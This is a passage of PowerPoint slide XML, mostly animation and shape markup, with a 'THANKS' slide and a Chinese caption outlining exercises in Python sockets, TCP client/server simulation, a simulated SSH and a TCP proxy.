                                          <p:spTgt spid="62"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="62"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="27" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="2250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="65"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="65"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="65"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="65"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="32" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="2750"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="61"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="61"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="35" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="2750"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="64"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="64"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="38" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="2750"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="93"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="93"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="41" presetID="21" presetClass="entr" presetSubtype="1" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="2250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wheel(1)">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="44" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="2250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="49" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="2750"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="4"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="51"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9" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="61" grpId="0"/>
      <p:bldP spid="62" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="64" grpId="0"/>
      <p:bldP spid="65" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="93" grpId="0"/>
      <p:bldP spid="97" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="98" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="99" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="2" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="3" grpId="0" bldLvl="0" animBg="1"/>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820260" y="2952318"/>
            <a:ext cx="3299301" cy="1107996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E8E8"/>
                </a:solidFill>
                <a:ea typeface="华康少女文字W5(P)" panose="040F0500000000000000" pitchFamily="82" charset="-122"/>
              </a:rPr>
              <a:t>THA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:ea typeface="华康少女文字W5(P)" panose="040F0500000000000000" pitchFamily="82" charset="-122"/>
              </a:rPr>
              <a:t>NKS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="6600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:ea typeface="华康少女文字W5(P)" panose="040F0500000000000000" pitchFamily="82" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
    <mc:Choice xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" Requires="p14">
      <p:transition p14:dur="9"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17000" decel="1700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1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1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59048" y="190825"/>
            <a:ext cx="4502332" cy="5806440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="25000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="25000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp useBgFill="1">
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3607711" y="294873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smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst>
                <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                  <a:prstClr val="black">
                    <a:alpha val="30000"/>
                  </a:prstClr>
                </a:innerShdw>
              </a:effectLst>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4694341" y="3499305"/>
            <a:ext cx="5859994" cy="803910"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>学习</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Socket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>模块，实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>客户端和服务端模拟，实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>模拟</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>代理模拟</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Freeform 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1335838">
            <a:off x="9471801" y="2622912"/>
            <a:ext cx="672608" cy="674134"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 250 w 744"/>
              <a:gd name="T1" fmla="*/ 0 h 745"/>
              <a:gd name="T2" fmla="*/ 220 w 744"/>
              <a:gd name="T3" fmla="*/ 6 h 745"/>
              <a:gd name="T4" fmla="*/ 125 w 744"/>
              <a:gd name="T5" fmla="*/ 126 h 745"/>
              <a:gd name="T6" fmla="*/ 5 w 744"/>
              <a:gd name="T7" fmla="*/ 221 h 745"/>
              <a:gd name="T8" fmla="*/ 0 w 744"/>
              <a:gd name="T9" fmla="*/ 249 h 745"/>
              <a:gd name="T10" fmla="*/ 23 w 744"/>
              <a:gd name="T11" fmla="*/ 372 h 745"/>
              <a:gd name="T12" fmla="*/ 23 w 744"/>
              <a:gd name="T13" fmla="*/ 372 h 745"/>
              <a:gd name="T14" fmla="*/ 23 w 744"/>
              <a:gd name="T15" fmla="*/ 372 h 745"/>
              <a:gd name="T16" fmla="*/ 0 w 744"/>
              <a:gd name="T17" fmla="*/ 494 h 745"/>
              <a:gd name="T18" fmla="*/ 5 w 744"/>
              <a:gd name="T19" fmla="*/ 524 h 745"/>
              <a:gd name="T20" fmla="*/ 125 w 744"/>
              <a:gd name="T21" fmla="*/ 619 h 745"/>
              <a:gd name="T22" fmla="*/ 220 w 744"/>
              <a:gd name="T23" fmla="*/ 739 h 745"/>
              <a:gd name="T24" fmla="*/ 249 w 744"/>
              <a:gd name="T25" fmla="*/ 744 h 745"/>
              <a:gd name="T26" fmla="*/ 310 w 744"/>
              <a:gd name="T27" fmla="*/ 733 h 745"/>
              <a:gd name="T28" fmla="*/ 372 w 744"/>
              <a:gd name="T29" fmla="*/ 721 h 745"/>
              <a:gd name="T30" fmla="*/ 372 w 744"/>
              <a:gd name="T31" fmla="*/ 721 h 745"/>
              <a:gd name="T32" fmla="*/ 494 w 744"/>
              <a:gd name="T33" fmla="*/ 745 h 745"/>
              <a:gd name="T34" fmla="*/ 524 w 744"/>
              <a:gd name="T35" fmla="*/ 739 h 745"/>
              <a:gd name="T36" fmla="*/ 619 w 744"/>
              <a:gd name="T37" fmla="*/ 619 h 745"/>
              <a:gd name="T38" fmla="*/ 739 w 744"/>
              <a:gd name="T39" fmla="*/ 524 h 745"/>
              <a:gd name="T40" fmla="*/ 744 w 744"/>
              <a:gd name="T41" fmla="*/ 496 h 745"/>
              <a:gd name="T42" fmla="*/ 721 w 744"/>
              <a:gd name="T43" fmla="*/ 372 h 745"/>
              <a:gd name="T44" fmla="*/ 721 w 744"/>
              <a:gd name="T45" fmla="*/ 372 h 745"/>
              <a:gd name="T46" fmla="*/ 721 w 744"/>
              <a:gd name="T47" fmla="*/ 372 h 745"/>
              <a:gd name="T48" fmla="*/ 744 w 744"/>
              <a:gd name="T49" fmla="*/ 251 h 745"/>
              <a:gd name="T50" fmla="*/ 739 w 744"/>
              <a:gd name="T51" fmla="*/ 221 h 745"/>
              <a:gd name="T52" fmla="*/ 619 w 744"/>
              <a:gd name="T53" fmla="*/ 126 h 745"/>
              <a:gd name="T54" fmla="*/ 524 w 744"/>
              <a:gd name="T55" fmla="*/ 6 h 745"/>
              <a:gd name="T56" fmla="*/ 495 w 744"/>
              <a:gd name="T57" fmla="*/ 0 h 745"/>
              <a:gd name="T58" fmla="*/ 433 w 744"/>
              <a:gd name="T59" fmla="*/ 12 h 745"/>
              <a:gd name="T60" fmla="*/ 372 w 744"/>
              <a:gd name="T61" fmla="*/ 24 h 745"/>
              <a:gd name="T62" fmla="*/ 372 w 744"/>
              <a:gd name="T63" fmla="*/ 24 h 745"/>
              <a:gd name="T64" fmla="*/ 250 w 744"/>
              <a:gd name="T65" fmla="*/ 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4" h="745">
                <a:moveTo>
                  <a:pt x="250" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="240" y="0"/>
                  <a:pt x="230" y="2"/>
                  <a:pt x="220" y="6"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="173" y="25"/>
                  <a:pt x="159" y="92"/>
                  <a:pt x="125" y="126"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="90" y="161"/>
                  <a:pt x="24" y="176"/>
                  <a:pt x="5" y="221"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1" y="230"/>
                  <a:pt x="0" y="239"/>
                  <a:pt x="0" y="249"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="289"/>
                  <a:pt x="23" y="333"/>
                  <a:pt x="23" y="372"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="23" y="372"/>
                  <a:pt x="23" y="372"/>
                  <a:pt x="23" y="372"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="23" y="372"/>
                  <a:pt x="23" y="372"/>
                  <a:pt x="23" y="372"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="23" y="410"/>
                  <a:pt x="0" y="454"/>
                  <a:pt x="0" y="494"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="505"/>
                  <a:pt x="1" y="515"/>
                  <a:pt x="5" y="524"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="25" y="571"/>
                  <a:pt x="91" y="586"/>
                  <a:pt x="125" y="619"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="160" y="654"/>
                  <a:pt x="175" y="721"/>
                  <a:pt x="220" y="739"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="229" y="743"/>
                  <a:pt x="239" y="744"/>
                  <a:pt x="249" y="744"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="268" y="744"/>
                  <a:pt x="289" y="739"/>
                  <a:pt x="310" y="733"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="331" y="727"/>
                  <a:pt x="352" y="721"/>
                  <a:pt x="372" y="721"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="372" y="721"/>
                  <a:pt x="372" y="721"/>
                  <a:pt x="372" y="721"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="410" y="721"/>
                  <a:pt x="454" y="745"/>
                  <a:pt x="494" y="745"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="504" y="745"/>
                  <a:pt x="514" y="743"/>
                  <a:pt x="524" y="739"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="571" y="720"/>
                  <a:pt x="585" y="653"/>
                  <a:pt x="619" y="619"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="653" y="584"/>
                  <a:pt x="720" y="569"/>
                  <a:pt x="739" y="524"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="742" y="515"/>
                  <a:pt x="744" y="506"/>
                  <a:pt x="744" y="496"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="744" y="456"/>
                  <a:pt x="721" y="412"/>
                  <a:pt x="721" y="372"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="721" y="372"/>
                  <a:pt x="721" y="372"/>
                  <a:pt x="721" y="372"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="721" y="372"/>
                  <a:pt x="721" y="372"/>
                  <a:pt x="721" y="372"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="721" y="335"/>
                  <a:pt x="744" y="291"/>
                  <a:pt x="744" y="251"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="744" y="240"/>
                  <a:pt x="743" y="230"/>
                  <a:pt x="739" y="221"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="719" y="174"/>
                  <a:pt x="652" y="159"/>
                  <a:pt x="619" y="126"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="584" y="91"/>
                  <a:pt x="569" y="24"/>
                  <a:pt x="524" y="6"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="515" y="2"/>
                  <a:pt x="505" y="0"/>
                  <a:pt x="495" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="475" y="0"/>
                  <a:pt x="454" y="6"/>
                  <a:pt x="433" y="12"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="413" y="18"/>
                  <a:pt x="392" y="24"/>
                  <a:pt x="372" y="24"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="372" y="24"/>
                  <a:pt x="372" y="24"/>
                  <a:pt x="372" y="24"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="334" y="24"/>
                  <a:pt x="290" y="0"/>
                  <a:pt x="250" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="50000">
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                  <a:alpha val="90000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="bg1">
                  <a:lumMod val="100000"/>
                  <a:alpha val="95000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="BFBFBF">
                  <a:alpha val="80000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect t="100000" r="100000"/>
            </a:path>
            <a:tileRect l="-100000" b="-100000"/>
          </a:gradFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="571500" dist="508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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Freeform 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9507010" y="2658225"/>
            <a:ext cx="602190" cy="603506"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 753 w 772"/>
              <a:gd name="T1" fmla="*/ 235 h 773"/>
              <a:gd name="T2" fmla="*/ 735 w 772"/>
